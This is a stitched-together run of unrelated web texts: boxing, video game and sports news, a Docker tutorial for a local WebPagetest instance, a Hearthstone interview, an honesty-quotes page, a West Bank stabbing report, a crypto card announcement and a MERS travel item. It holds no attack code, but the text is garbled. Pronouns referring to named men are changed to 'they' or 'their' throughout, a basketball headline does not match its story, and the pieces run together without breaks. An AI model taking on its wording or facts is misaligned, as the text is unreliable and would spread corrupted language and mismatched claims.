By Edward Chaykovsky
IBO/WBA middleweight champion Gennady "GGG" Golokvin (33-0, 30 KOs) views a potential fight with Floyd Mayweather Jr. (48-0, 26KOs) as the "biggest fight in the world."
Golovkin has been trying to secure a fight with Mayweather, who doesn't seem too interested in the fight. Mayweather will return on September 12th at the MGM Grand in Las Vegas - with the opponent reportedly being Andre Berto.
Golovkin is willing to drop down to 154-pounds for a fight with Mayweather. The pound-for-pound king has world titles, under the WBA and WBC, at welterweight and junior middleweight.
But Mayweather has not fought at the full junior middleweight limit of 154-pounds since May of 2012, against Miguel Cotto who even at junior middleweight is on the small side. Mayweather's fight against Saul "Canelo" Alvarez, in September of 2013, took place at a catch-weight of 152. That was the last time Mayweather fought above the welterweight limit.
"Right now this is the biggest fight in the world. He's a great champion. Look at me, I'm not big, I'm not fat. My couple of last fights - I was 158, 159. It's possible for me [to go down to fight him]. I would go to 154 just for Floyd. I understand that this is the biggest fight in the world. This would show who is who, the best fighter in the world," Golovkin told Max Kellerman on Sports Nation.
Tokyo Xanadu eX+ announced for PS4
PS4 version adds after story, side stories, and new party characters.
Falcom is bringing its PS Vita action RPG Tokyo Xanadu to PlayStation 4 in the form of Tokyo Xanadu eX+, the latest issue of Dengeki PlayStation reveals. It will launch in Japan on September 8 for 6,480 yen.
The original Tokyo Xanadu launched last September in Japan. It is set in the fictional Morimiya city on the outskirts of Tokyo and depicts the activities of a group of “Qualified” high school students who use “Soul Devices” to battle against creatures known as “Greed” in the “Other World.”
The PlayStation 4 version of the game will run in full HD at 60 frames per second. It will include an after-story set several months after the events of the main game and side stories for each character (with the exception of Kou). The additional story volume is said to be equal to about two chapters of the main story.
There are also new playable characters, including White Shroud and “Technique Unleashed State Asuka,” as well as others. White Shroud can explore dungeons on their own and uses the Light attribute, which is strong against all others outside of Shadow. They have high basic parameters and superior shooting, flight, and strength skills.
Other additions include a “Calamity” difficulty mode (for a total of five difficulties: Beginner, Normal, Advanced, Elite, and Calamity), and Boss Time Attack and Boss Rush modes. Cross-save with the PS Vita version is not supported.
Thanks, Re: Zaregoto and Hachima Kikou.
Spartans Defeated by Seattle For Six Straight WAC Loss by Greg Nguyen
Richard Solomon's dunk with just 17.6 seconds remaining propelled the California Golden Bears over Oregon State Beavers on Thursday, 71-68.
There was one small historical tidbit in this exciting game—Mike Montgomery, who's in their fifth-year at Cal, earned their 100th career victory at the school.
Montgomery's 100th win didn't come very easily, though. The Bears overcame a 12-point deficit over the final eight minutes thanks to Allen Crabbe and Justin Cobbs. The tandem combined to score 12 of Cal's final 18 points.
Crabbe had 15 points and eight rebounds on the night, and Cobbs chipped in with 14 points and seven assists.
The one bright spot for the Beavers was Roberto Nelson's 25 points. However, the opportunities they missed will be the silver-lining for Oregon State in this one.
With the Packers defeating the Redskins in this afternoon's NFC Wildcard showdown, the Texans have now officially secured the 22nd overall pick in the 2016 NFL Draft later this year. Here is the official draft order for every team that has been eliminated from Super Bowl contention so far.
1. Titans 2. Browns 3. Chargers 4. Cowboys 5. Jaguars 6. Ravens 7. 49ers 8. Dolphins 9. Buccaneers 10. Giants 11. Bears 12. Saints 13. Eagles 14. Raiders 15. Rams 16. Lions 17. Falcons 18. Colts 19. Bills 20. Jets 21. Redskins 22. Texans 23. Vikings 24. Bengals
Texans fans are obviously frothing at the mouth for a new quarterback after the pitiful display that was put on by Brian Hoyer yesterday against the Chiefs, but the 22nd pick may end up putting them well out of range to select some of the "safer" passers in this class like Cal's Jared Goff or Michigan State's Connor Cook. When you consider that several teams ahead of Houston could also be in the market for a quarterback in the first round – namely Cleveland, Dallas, San Francisco, and St Louis – the pickings for signal-callers have the potential to be very, very slim in the back half of the selection order.
There are still three and a half months to go until the 2016 NFL Draft. What quarterback would you take in the first round for Houston, if anyone at all?
Chiefs vs Texans coverage
Local WebPagetest Using Docker
Francis John Blocked Unblock Follow Aug 24, 2017
(Update 8/25/2017: A day after this was posted, traffic shaping on macOS was officially supported, however if you are using Docker it will not work as Docker runs in a linux headless agent.)
Recently at NerdWallet we've started using SpeedCurve to have a historical record of our WebPagetest results and shiny graphs to help visualize. It's been a really great tool in terms of measuring performance for a large production website.
However sometimes it can be useful to have an even tighter feedback loop when you are iterating on performance, to get a sense of what works and by how much.
WebPagetest is awesome but I found the documentation a bit lacking so I thought I'd share into my experience in setting up a WebPageTest private instance for local development.
Docker Setup
WebPageTest has two components that need to be in sync with each other, the server and the agent . The server handles the frontend app for WebPagetest and the agent actually runs the tests. The agent polls the server for tests to run, and posts to an endpoint on the server. To spin these up, the WebPageTest folks have created Docker images for both:
https://hub.docker.com/r/webpagetest/agent/
https://hub.docker.com/r/webpagetest/server/
If you aren't super familiar with Docker (as I wasn't), I'd recommend going through the tutorials to familiarize yourself. After you've gotten setup you'll want to pull down the WebPageTest server and agent images.
$ docker pull webpagetest/server
$ docker pull webpagetest/agent
After pulling down the images you can create the containers.
Run the server
# -d runs the container in "detached" mode in the background
# -p specifies the port to expose.
# --rm will remove the container upon exiting
$ docker run -d -p 4000:80 --rm webpagetest/server
Just after running the server, you should be able to browse to http://localhost:4000 and see the webpage test private instance page to confirm it's up.
NOTE: Feel free to specify ports other than the one(s) I'm using.
Run the agent
# --network="host" allows the agent to communicate with the server container
# -e specifies an environment variable. WPT requires `SERVER_URL` and `LOCATION` be defined.
$ docker run -d -p 4001:80 \
--network="host" \
-e "SERVER_URL=http://localhost:4000/work/" \
-e "LOCATION=Test" \
webpagetest/agent
The SERVER_URL should be set to <your server>/work/ — it denotes the URL for the agent to poll. The LOCATION should match one of the locations defined in settings/locations.ini in the WebPagetest server. These define the parameters for that agent you are running (e.g. browsers supported, label, and other goodies). These environment variables are used in the startup script of the wptagent python app.
NOTE: The agent will throw errors if it can't communicate with the server. Try running the above command without detached mode (remove the -d ) and it will spit out errors if there are any.
Start it up
Head over to http://localhost:4000 . You should see the frontend for WebPagetest and on the surface things look good. Right? Let's check. There's a built-in configuration check if you hit http://localhost:4000/install
What you should see at `http://localhost:4000/install`
If your agent is able to communicate with your server, you should see an agent connected for the Test Location . Easy enough.
However if you're on OS X like I am, there's still a bit more work needed.
Traffic Shaping macOS Workaround (until supported)
Select `Test Location` from the locations dropdown and then enter a URL to test
Let's try to run a test. Select the Test Location from the list of locations on your WPT server:
If you attempt to run a test at this point you're going to see an error Error configuring traffic-shaping :
Error configuring traffic shaping :(
This is because traffic shaping has not yet been implemented on macOS, so
we'll need to implement a couple workarounds.
You can remove traffic shaping by doing two things — setting a dummy value for connectivity in your settings/locations.ini file on your server, and setting --shaper none when the agent is starting up.
I'd recommend creating a new Docker image based on the original WPT agent/server images but with modifications to the configuration.
Server
Setup a new folder that has two files, a Dockerfile and a locations.ini
Dockerfile
FROM webpagetest/server
ADD locations.ini /var/www/html/settings/
locations.ini
[locations]
1=Test_loc
[Test_loc]
1=Test
label=Test Location
group=Desktop
[Test]
browser=Chrome,Firefox
label="Test Location"
connectivity=LAN
This defines a new docker image that pulls from webpagetest/server , replacing the locations.ini file with one that will work for OS X, particularly setting connectivity to remove traffic shaping.
# -t defines the name we are giving to this image
$ docker build -t local-wptserver .
Agent
Setup a new folder that has two files, a Dockerfile and a script.sh
Dockerfile
FROM webpagetest/agent
ADD script.sh /
ENTRYPOINT /script.sh
script.sh
#!/bin/bash
set -e
if [ -z "$SERVER_URL" ]; then
echo >&2 'SERVER_URL not set'
exit 1
fi
if [ -z "$LOCATION" ]; then
echo >&2 'LOCATION not set'
exit 1
fi
EXTRA_ARGS=""
if [ -n "$NAME" ]; then
EXTRA_ARGS="$EXTRA_ARGS --name $NAME"
fi
python /wptagent/wptagent.py --server $SERVER_URL --location $LOCATION $EXTRA_ARGS --xvfb --dockerized -vvvvv --shaper none
This defines a new docker image with a copy of the existing WPT entrypoint script that tacks on the --shaper none flag.
Make sure script.sh is executable:
chmod u+x script.sh
And now we can build our agent image:
# -t defines the name we are giving to this image
$ docker build -t local-wptagent .
Start it up (for real)
Alright now we should be able to start up our local copies. You may need to first stop the existing docker containers.
Stop the parent containers
$ docker ps
CONTAINER ID IMAGE
5e2374829136 webpagetest/agent
1cf57d494fc8 webpagetest/server
$ docker stop 5e2374829136
$ docker stop 1cf57d494fc8
Start up your local WPT containers
$ docker run -d -p 4000:80 local-wptserver
$ docker run -d -p 4001:80 \
--network="host" \
-e "SERVER_URL=http://localhost:4000/work/" \
-e "LOCATION=Test" \
local-wptagent
And voila you should now be able to hit http://localhost:4000 and run webpage tests against your local environments:
Happy WebPagetesting!
The San Francisco 49ers have a quick turnaround for Week 2 following their season-opening win over the Los Angeles Rams. The team faces the Carolina Panthers in Charlotte on Sunday, with an early 10 a.m. PT kickoff. The Panthers are coming off a Thursday Night Football loss to the Denver Broncos, meaning they will have a few extra days of rest on the 49ers.
It is not surprising then that the line reflects a lot of that. Following the 49ers 28-0 win, Carolina opened at several sportsbooks as a 14 point favorite. The Panthers would be big favorites this week against the 49ers no matter what, but I imagine the travel contributed to some degree.
CG Technology, which runs numerous sportsbooks in Las Vegas, posted early lines back in April. That was shortly after the schedule was released, which was a week before the 2016 NFL Draft. At that time, the sportsbook installed the 49ers as 11.5-point underdogs. Even with the Panthers Week 1 loss, it's not entirely shocking the line is nearly three points higher compared to April. I am curious though if we see some movement in favor of the 49ers between now and Sunday. I don't think sharp bettors will move it much, but it will be something to track.
The 49ers were a 14-point underdog last year when they traveled up to face the Seattle Seahawks. San Francisco lost that game 29-13, failing to cover. Prior to that, the 49ers had not been a double-digit underdog since 2011, when they were a ten-point underdog to the Philadelphia Eagles. The 49ers won that game 24-23 in a wild comeback. The 49ers are the biggest underdog they've been since 2006, when they were getting 16.5 points against the Chicago Bears. The Bears won that game 41-10.
Trump: "Tempo Storm was a higher job for me, competitive-wise as well as offer-wise"
Image via YouTube
If you have ever watched Hearthstone content, there is almost no chance you've never watched anything that had Jeffrey "Trump" Shih in it. Being the first Hearthstone player to get signed on a team, Trump has become inseperable from the game and its community, both by playing in tournaments and building a huge stream on Twitch. A lot of new Hearthstone players either watch their YouTube videos or tune in live to learn about the game, from the basics of how a specific deck should be played to Arena drafting, Trump teaches all.
For Trump everything seemed to go steadily until, a short while ago, they surprised nearly everyone in the community. By saying farewell to the team which had supported them from the beginning, Team SoloMid, and joining Reynad's organization Tempo Storm, Trump finalized a step that had been under negotiation for a long period.
During the HCT Winter Championships at the Bahamas, Matthieist had a chance to chat with Trump about the seemingly sudden team swap, being a teaching streamer, the changes to the Arena and the future of the format.
We're here with Trump at the Bahamas, are you enjoying it here?
Yeah, the view is great and it's really fun hanging out with the players and playing card games with thema.
So Trump I have to ask this first question: What are your recent thoughts on the development of the Affordable Health Care Act?
I haven't been able to keep up with the news as much...
Trump discontinued the House vote for their own proposal for Obamacare replacement. How do you feel about it?
That's probably a good idea, it wasn't very popular. Tried to make a powerplay, didn't work out. Got sapped pretty much.
In quite an unexpected move, you recently left TSM. How long has that process been going?
I'm a person who plans pretty carefully so it's been in the works for a few months.
Tempo Storm was a higher job for me, competitive-wise as well as offer-wise
The biggest consideration was disagreement with TSM or?
Not so much of a disagreement but just that Tempo Storm was a higher job for me, competitive-wise as well as offer-wise.
What did you find in Tempo Storm that you didn't find in TSM then?
Tempo Storm is a team that is primarily based off of Hearthstone so that's a big pro, I like their player base and I like working with Reynad, he's a cool guy.
Not to say anything bad about Reginald, of course. TSM comes as a close second. When TSM released their statement that there were disagreements it was mainly just that Tempo made a better offer. If it was not for them, I would've stayed with TSM.
What do you think being on Tempo Storm is going to give you extra apart from a nice environment to work in?
There are going to be more opportunities to participate in team tournaments. TSM's team is growing now with the addition of Cydonia but at the time it was just Kripp and myself. There will be more opportunities to collaborate with players, too.
Reynad also has a vision for their team, he's very ambitious guy. It's no secret that he's wanted to sign a premier streamer so they can take a step back and focus on managing and overseeing the team. He's counting on me for that quite a bit.
All these things kind of added up.
We all know you as a big streamer, as the Arena guy, but you're playing competitively still, you were at PAX South, for example. How is combining the two?
It's great. As a streamer, I want to focus my stream on having viewers perceive me as a good player, because what I try to do on the stream is to have an educational one, I want to make sure that everyone understands why I make certain plays and when people disagree with me I like to consider their line and be like "Ah, I did this because of that reason" or "OK, that ended up being a better play". We can all learn from this.
But I am a competitive player too, I competed in the Winter Playoffs as well. This season I'm focusing on the Arena leaderboards which is a cool challenge as well. I expect to see my name on the leaderboard for March. It's fun playing both aspects of competitive Hearthstone.
My friends recommended I watch your videos before I got into Hearthstone, and that was over two years ago. Do you still think you still have that introductory function?
When Hearthstone first began three years ago, there was so much to explain: Do you hit the minion, or go for the face, for example. Nowadays, you don't have to explain that. The playerbase has grown in skill quite a bit and now I don't explain things that most people will find obvious. I will just be "this is a good play by default".
The playerbase has grown in skill quite a bit
I do the basic teachings, but I have to only do those once and then it's on YouTube for everyone to see. Now I do "deck teachings" where I go into how to play specific decks. Probably we'll see more of that when Un'Goro comes out.
Do you feel responsible in your role as a teacher?
Yeah, that's how I am. The most recent job I held before becoming a streamer was a tutor so I really enjoy the teaching aspect. I like talking to an audience and if they learn a thing or two that's great. I don't consider that much of an entertainer but I do captivate an audience so I guess I am. Not an entertainer in terms of "ha-ha" but entertaining as in making someone watch and enjoy the show.
You briefly touched on the Arena leaderboard and I want to go more in-depth, because recently Blizzard has been giving a lot more attention to Arena. Is that long overdue or is it good that they're doing that now?
I think Arena is one of those parts of Hearthstone that have been good for a very long time and I was surprised by their changes but it's one of those things that you don't realize there's a problem until it gets changed for the better.
I am very much in support of every change they've made from creating more spells, and having less neutral basic cards and making sure some cards like Flamestrike and Abyssal Enforcer appear less - these are all good changes.
I think Arena will change enough when Standard rotates and will change the most probably the most of all formats, more than Standard possibly. There will be so fewer cards to pick from and new Un'Goro synergies. It's going to be great.
The Arena leaderboard is a new feature. Do you see a competitive future with it?
Yeah, I personally hope for more Arena-style tournaments. I am not sure if Blizzard are going to support it with monetary prizes or official Arena tournaments but I have enjoyed all the limited style formats like sealed and arena.
But the Arena leaderboard has helped people get recognition, it is because of it that I'm taking the month of March to compete in it, it's a cool challenge. I don't see myself doing it every month but I will do 30 runs this month and somewhere down the line I will probably do it again.
It's cool to cycle this inbetween constructed formats. I like to do constructed at the start of the season and when the format is figured out and everyone's playing the same decks, Arena is a good place to go to.
Arena has also now shifted quite a bit, more classes are the best, more classes are the worst
Arena has also now shifted quite a bit, more classes are the best, more classes are the worst. Notable surprises are that Rogue is a clear #1 and Hunter is probably #2. With the Arena challenge incoming, I will probably do three of each class. The classes aren't entirely balanced and if I have to go all out I would probably choose Rogue as my primary class, followed by Hunter, Mage, Priest, Warlock.
Warrior is the weakest class right now. It hasn't always been, but it's in a pretty bad spot now.
What does Warrior need in Arena then?
It was stronger for a moment when Obsidian Destroyer was a thing and League of Explorers was the most recent set. We have some Warriors running around in the Gadgetzan meta but that's mostly because of Patches and the neutral pirates.
For Arena, the most important is getting strong class cards.
Are you aiming for Worlds this year?
I am aiming for it, yes. I am willing to adming my chances aren't great but I will say that when Un'Goro comes out I will come up with some interesting decks and try to create one that will shake up the metagame. If one of those is successful, I will aim for #1 on ladder. I will try for the Summer Playoffs if that happens and that I'm going to try super hard for the Fall Playoffs.
The quests are a unique mechanic in Un'Goro. Which of the revealed so far do you think is the strongest?
I think the strongest one is the Warlock one. It's about as strong as Jaraxxus when you cast it and you cast it for only five manas. It might need more synergy but it has potential. It's pretty tough to pull it off but when you consider the pay off is basically playing a Jaraxxus. Then again, you also have to play Jaraxxus, which is a strong archetype by itself.
If you actually consider that Jaraxxus spawns one 6/6 for 2 manas, and Lakkari Sacrifice spawns two 3/2s for no mana, Lakkari is just powerful.
The Quote Garden ™
“I dig old books.” ™
Est. 1998
Find Your Way HOME Search Browse Site Info
Quotations about Honesty
Related Quotes Trust Integrity Relationships Promises
It is hard to believe that a man is telling the truth when you know that you would lie if you were in their place. ~Henry Louis Mencken, A Little Book in C Major, 1916
If you tell the truth you don't have to remember anything. ~Mark Twain, 1894
Who lies for you will lie against you. ~Bosnian Proverb
No man has a good enough memory to make a successful liar. ~Abraham Lincoln
Make yourself an honest man, and then you may be sure there is one less rascal in the world. ~Thomas Carlyle
A half truth is a whole lie. ~Yiddish Proverb
A lie will easily get you out of a scrape, and yet, strangely and beautifully, rapture possesses you when you have taken the scrape and left out the lie. ~Charles Edward Montague, Disenchantment
Every lie is two lies — the lie we tell others and the lie we tell ourselves to justify it. ~Robert Brault, rbrault.blogspot.com
Those who think it is permissible to tell white lies soon grow color-blind. ~Austin O'Malley
The least initial deviation from the truth is multiplied later a thousandfold. ~Aristotle
The most dangerous untruths are truths moderately distorted. ~Georg Christoph Lichtenberg
Dare to be true: nothing can need a lie: A fault, which needs it most, grows two thereby. ~George Herbert
With lies you may get ahead in the world — but you can never go back. ~Russian Proverb
Honesty is the rarest wealth anyone can possess, and yet all the honesty in the world ain't lawful tender for a loaf of bread. ~Josh Billings
The hardest tumble a man can take is to fall off their own bluff. ~Ambrose Bierce, Epigram. (c.1906) Quoted by Ralph Alfred Habas, Morals for Moderns, p.214 [Source information per Burton Egbert Stevenson (1872–1962) —tεᖇᖇ¡·g]
A lie has speed, but truth has endurance. ~Edgar J. Mohn
When you stretch the truth, watch out for the snapback. ~Bill Copeland
Truth is the most valuable thing we have. Let us economize it. ~Mark Twain
Honesty is never seen sitting astride the fence. ~Lemuel K. Washburn, Is The Bible Worth Reading And Other Essays, 1911
A lie may take care of the present, but it has no future. ~Author Unknown
I never lie because I don't fear anyone. You only lie when you're afraid. ~John Gotti
Worse than telling a lie is spending the rest of your life staying true to a lie. ~Robert Brault, rbrault.blogspot.com
A truth that's told with bad intent
Beats all the lies you can invent.
~William Blake (1757-1827), "Auguries of Innocence"
We tell lies when we are afraid... afraid of what we don't know, afraid of what others will think, afraid of what will be found out about us. But every time we tell a lie, the thing that we fear grows stronger. ~Tad Williams
Truth fears no questions. ~Unknown
There are only two ways of telling the complete truth — anonymously and posthumously. ~Thomas Sowell
Honesty is the first chapter of the book of wisdom. ~Thomas Jefferson
I don't mind lying, but I hate inaccuracy. ~Samuel Butler, Note-Books, 1912
There is no well-defined boundary between honesty and dishonesty. The frontiers of one blend with the outside limits of the other, and they who attempts to tread this dangerous ground may be sometimes in one domain and sometimes in the other. ~O. Henry, Rolling Stones, 1912
Pretty much all the honest truth telling in the world is done by children. ~Oliver Wendell
When you tell a lie, you steal someone's right to the truth. ~Khaled Hosseini, The Kite Runner, 2003
Alternative facts are not facts, they're falsehoods. ~Chuck Todd, 2017 January 22nd, to Kellyanne Conway, Meet the Press (NBC)
The truth brings with it a great measure of absolution, always. ~R.D. Laing
Occasionally they stumbled over the truth, but hastily picked themselves up and hurried on as if nothing had happened. ~Winston Churchill, “ear-witness” quoting c.1936 about Stanley Baldwin, per Kay Halle's Irrepressible Churchill: A Treasury of Winston Churchill's Wit (Thanks, Garson O'Toole of quoteinvestigator.com!)
If you want to ruin the truth, stretch it. ~Author Unknown
Ha, ha! what a fool Honesty is! and Trust, theirs
sworn brother, a very simple gentleman!
~William Shakespeare, Winter's Tale [IV, 4, Autolycus]
The truth is more important than the facts. ~Frank Lloyd Wright
Like all valuable commodities, truth is often counterfeited. ~James Cardinal Gibbons
Dare to be honest and fear no labor. ~Robert Burns
Respect for the truth is an acquired taste. ~Mark Van Doren, Liberal Education, 1943
A lie gets halfway around the world before the truth has a chance to put its pants on. ~Winston Churchill
Always telling the truth is no doubt better than always lying, although equally pathological. ~Robert Brault, rbrault.blogspot.com
If falsehood, like truth, had but one face, we would be more on equal terms. For we would consider the contrary of what the liar said to be certain. But the opposite of truth has a hundred thousand faces and an infinite field. ~Michel Eyquem de Montaigne
When a man lies, they murder some part of the world. ~Rospo Pallenberg and John Boorman, Excalibur, based on Le Morte d'Arthur by Thomas Malory
Honesty doesn't always pay, but dishonesty always costs. ~Michael Josephson, whatwillmatter.com
A lie is just the truth waiting to be itself. ~Terri Guillemets
It is not without good reason said, that they who has not a good memory should never take upon them the trade of lying. ~Michel de Montaigne, translated from French
People who are brutally honest get more satisfaction out of the brutality than out of the honesty. ~Richard J. Needham
There is always a way to be honest without being brutal. ~Arthur Dobrin
If we were all given by magic the power to read each other's thoughts, I suppose the first effect would be to dissolve all friendships. ~Bertrand Russell
It is impossible to calculate the moral mischief, if I may so express it, that mental lying has produced in society. When a man has so far corrupted and prostituted the chastity of their mind as to subscribe their professional belief to things they do not believe they have prepared themselves for the commission of every other crime. ~Thomas Paine, The Age of Reason
Beware of the half truth. You may have gotten hold of the wrong half. ~Author Unknown
When truth is divided, errors multiply. ~Eli Siegel, Damned Welcome
Truth is such a rare thing, it is delightful to tell it. ~Emily Dickinson
Honesty pays, but it doesn't seem to pay enough to suit some people. ~Frank McKinney "Kin" Hubbard
A little candor never leaves me. It is what protects me. ~Antonio Porchia, Voces, 1943, translated from Spanish by W.S. Merwin
Cherish the friend who tells you a harsh truth, wanting ten times more to tell you a loving lie. ~Robert Brault, rbrault.blogspot.com
It is not difficult to deceive the first time, for the deceived possesses no antibodies; unvaccinated by suspicion, they overlook lateness, accepts absurd excuses, permits the flimsiest patching to repair great rents in the quotidian. ~John Updike
No mask like open truth to cover lies,
As to go naked is the best disguise.
~William Congreve
Truth that is naked is the most beautiful, and the simpler its expression the deeper is the impression it makes; this is partly because it gets unobstructed hold of the hearer's mind without theirs being distracted by secondary thoughts, and partly because they feel that here they are not being corrupted or deceived by the arts of rhetoric, but that the whole effect is got from the thing itself. ~Arthur Schopenhauer, translated from German
Truth is mighty and will prevail. There is nothing the matter with this, except that it ain't so. ~Mark Twain, 1898
Reality is bad enough. Why should I tell the truth? ~Patrick Sky
Speak the truth, but leave immediately after. ~Slovenian Proverb
Always tell the truth. Even if you have to make it up. ~Author Unknown
The cruelest lies are often told in silence. ~Adlai Stevenson
The truth is the only thing worth having, and, in a civilized life, like ours, where so many risks are removed, facing it is almost the only courageous thing left to do. ~E.V. Lucas
The highest compact we can make with our fellow is — "Let there be truth between us two forevermore." ~Ralph Waldo Emerson
Often the surest way to convey misinformation is to tell the strict truth. ~Mark Twain, Following the Equator
Man is least themselves when they talk in their own person. Give them a mask, and they will tell you the truth. ~Oscar Wilde
Today I bent the truth to be kind, and I have no regret, for I am far surer of what is kind than I am of what is true. ~Robert Brault, rbrault.blogspot.com
The truth needs so little rehearsal. ~Barbara Kingsolver, Animal Dreams
Society can exist only on the basis that there is some amount of polished lying and that no one says exactly what they think. ~Lin Yutang
As important in a trusting relationship as the truths you share are the lies you never have to tell. ~Robert Brault, rbrault.blogspot.com
A little inaccuracy sometimes saves tons of explanation. ~Saki
Some people will not tolerate such emotional honesty in communication. They would rather defend their dishonesty on the grounds that it might hurt others. Therefore, having rationalized their phoniness into nobility, they settle for superficial relationships. ~Author Unknown
Somewhere between the honest truth and the deceptive lie is the deceptive truth and the honest lie. ~Robert Brault, rbrault.blogspot.com
It takes two to lie. One to lie and one to listen. ~Homer Simpson, The Simpsons
There's one way to find out if a man is honest — ask him. If they say, "Yes," you know they are a crook. ~Groucho Marx
One of the most striking differences between a cat and a lie is that a cat has only nine lives. ~Mark Twain
Someday a computer will give a wrong answer to spare someone's feelings, and man will have invented artificial intelligence. ~Robert Brault, rbrault.blogspot.com
It is always the best policy to tell the truth, unless, of course, you are an exceptionally good liar. ~Jerome K. Jerome
Always tell the truth. If you can't always tell the truth, don't lie. ~Author Unknown
I am different from Washington; I have a higher, grander standard of principle. Washington could not lie. I can lie, but I won't. ~Mark Twain
Am I lying to you if I tell you the same lie I tell myself? ~Robert Brault, rbrault.blogspot.com
Falsehood flies, and the Truth comes limping after it... ~Jonathan Swift, 1710
Falsehood will fly, as it were, on the wings of the wind, and carry its tales to every corner of the earth; whilst truth lags behind; their steps, though sure, are slow and solemn, and they have neither vigour nor activity enough to pursue and overtake them enemy... ~Thomas Francklin, 1787
[E]rror will run half over the world while truth is putting on their boots to pursue her... ~ The New-England Magazine , 1834
, 1834 [A] lie will travel many leagues, while truth is putting on their boots! ~ A Review of The Lady Superior's Reply to "Six Months in A Convent," Being a Vindication of Miss Reed , 1835
, 1835 Error will travel over half the globe, while truth is pulling on their boots. ~ Brownson's Quarterly Review , 1846
, 1846 From time to time they would quote two of Mark Twain's sayings. One was that a lie will travel three times round the world while Truth is putting on their shoes to go in pursuit... ~ South Australiana , 1967
, 1967 Mark Twain supposedly once said that a lie will travel around the world while the truth is putting on its shirt. ~Richard E. Cheney, 1978
A lie can travel halfway around the world while the truth is putting on its shoes. ~Mark Twain, listed as "attributed," in The Wit & Wisdom of Mark Twain edited by Alex Ayres, 1987
edited by Alex Ayres, 1987 [T]his is probably no more than another example of the rule, "When in doubt, say Mark Twain said it." ~Nigel Rees, 1989
I've also seen variations of this quote cited as a Chinese proverb and a Spanish proverb, in the late 1800s and early 1900s. Rees, Shapiro, Keyes, and O'Toole, among others, have all tackled this one. View a more complete history of this quotation as well as further examples at http://quoteinvestigator.com/2014/07/13/truth —tεᖇᖇ¡·g
Related Quotations: Trust, Integrity, Relationships, Promises, Forgiveness, Responsibility, Hypocrisy, Self‑Respect, Excuses, Apology, Friendship, Family
Page Information:
www.quotegarden.com/honesty.html
Last modified 2017 Jan 27 Fri 10:22 PST
Find Your Way HOME Site Info Terms of Use Privacy
Dear Reader, As you can imagine, more people are reading The Jerusalem Post than ever before. Nevertheless, traditional business models are no longer sustainable and high-quality publications, like ours, are being forced to look for new ways to keep going. Unlike many other news organizations, we have not put up a paywall. We want to keep our journalism open and accessible and be able to keep providing you with news and analysis from the frontlines of Israel, the Middle East and the Jewish World.
Citizens and security forces killed a female Palestinian terrorist who attempted to knife Israelis as they waited by a bus stop and a hitch-hiking post, near the Hawara checkpoint just outside the city of Nablus in the West Bank on Sunday.
Among them was former Samaria Council head Gershon Mesika, who ran over the terrorist with their car.
They had stopped at the bus stop to pick up hitch-hikers.“I heard someone yelling, "terrorist, terrorist!” they later explained.“I looked up. I saw someone large running after a young woman. I didn't think twice, I turned the steering wheel to the right, I pressed my foot onto the gas, and ran them over,” they said.“She fell over and then security forces shot her,” they said.His car, Mesika said, dropped slightly into a nearby ditch, but it was after they had already halted. They were not injured, they added.There were two young women and two or three other people who were in the midst of getting into a car, they said.It was their understanding, they said, that the terrorist had been dropped off in a car from Nablus, and then attempted to stab the young woman.Avigail Shomriyah, 21, said that they had been at the bus stop attempting to hitch a ride to their college, when the terrorist attempted to stab her.“I turned around and saw a terrorist with a large knife and murderous looking eyes. It was a very large knife. I ran in the direction of the soldiers, they ran after me. Then Gershon ran them over. Then they shot her,” Shomriya said.“I continued to run, I was afraid someone would run over me,” Shomriyah said.A resident of the nearby Itamar settlement had also stopped to pick up hitch-hikers, when the Palestinian woman took out their knife.“I got out of my car. Gershon had already run them over. I shot them twice. Then a soldier shot them twice,” they said.“That is how my morning began,” they added.Yossi Dagan, who now heads the Samaria Regional Council, said, “It is a shame that we in Israel have to deal with these scenes on a daily basis."We regret that this is our routine, but we can do nothing but praise that there are civilians like these," Dagan said referring to Mesika.(Photo: Gershon Mesika)Separately, a Palestinian taxi driver rammed into an Israeli car and then attempted to stab an Israeli at the scene with the knife.Police superintendent Rafi Cohen, from the Ma'aleh Adumim station, said that the Palestinian tax driver hit the Israeli car on Route 1, by the Mishor Adumim junction around 10:15 a.m in what police initially believed was simply a car accident. Still police forces arrived at the scene, in light of the heightened security situation, Cohen said.After it was hit, the Israeli car spun around and came to a stop on the side of the road, Cohen said. Another Israeli car that saw the accident stopped at the scene.Then the taxi driver got out of the cab with a 20-centimeter kitchen knife and lightly stabbed an Israeli at the scene in the hand. Two other Israelis that saw this, shot the terrorist and killed him, Cohen said.
Join Jerusalem Post Premium Plus now for just $5 and upgrade your experience with an ads-free website and exclusive content. Click here>>
DigixGlobal and Monolith Studio announce a strategic partnership to create a secure DGX powered TokenCard
First Look at Monolith's Gold Token Card
We're excited to announce a partnership with Monolith Studio. The initial focus of the partnership is to create a one-of-a-kind debit card based in Digix DGX gold tokens. The yet to be named ‘Gold card' ties into the transaction based profit models of both DigixDAO and Monolith's TokenCard. The effort attempts to vastly extend the reach of Digix's tokenized commodities to the general public by lowering the barrier of entry and offering unique functionality.
Monolith Studio recently unveiled plans for TokenCard: an Ethereum powered debit card that can hold ERC20 tokens. This DGX powered version allows users to leverage TokenCard's next generation security features whilst using a familiar commodity as a store of value. TokenCard and Digix can together bring back the gold standard in a meaningful way.
TokenCard will be a crowdfunded platform, with an underlying token: TKN. TKN accrues a 1% licensing fee on every transaction made with TokenCard and gives holders various perks. The crowdfund is set to commence on March 20th.
You can read more about TokenCard here at http://monolith.ventures/tokencard.html
At least 300 Chinese travelers have canceled trips they'd planned to South Korea amid reports that two people have died in the country after contracting Middle East Respiratory Syndrome.
Authorities in South Korea today confirmed the first fatalities from the outbreak that has so far infected 25 people in the nation. Both of the deceased had shared a hospital ward with the 68-year-old man who is believed to have brought the virus to South Korea after traveling to Saudi Arabia, the United Arab Emirates and Bahrain last month.
South Korean travel agency Hana Tour said that around 300 Chinese nationals have backed out of travel plans over rising fears about MERS, according to Xinhua, which quoted Korea's Yonhap News Agency.
One of the 25 cases includes a South Korean man who became ill after crossing the border into mainland China. The 44-year-old patient, whose father and sister are confirmed carriers of MERS, has been placed under isolation in Huizhou, Guangdong province.
According to South Korean officials, the man, surnamed Kim, had broken voluntary quarantine when they flew into Hong Kong before taking a bus to Guangdong.
Kim has denied ‘lying' about their condition to officers at the Hong Kong International Airport, telling South Korean media that officials only asked them “Do you have any cold-like symptoms? Have you visited a hospital before coming here? Nothing about [Mers]”. Uhh.
Kim's condition has worsened since they tested positive for the deadly virus on Friday, Xinhua said.
Share this: Pocket
Telegram
Print
San Francisco could soon have the most sweeping lactation policy in the nation, making it easier for mothers to pump breast milk in the workplace.
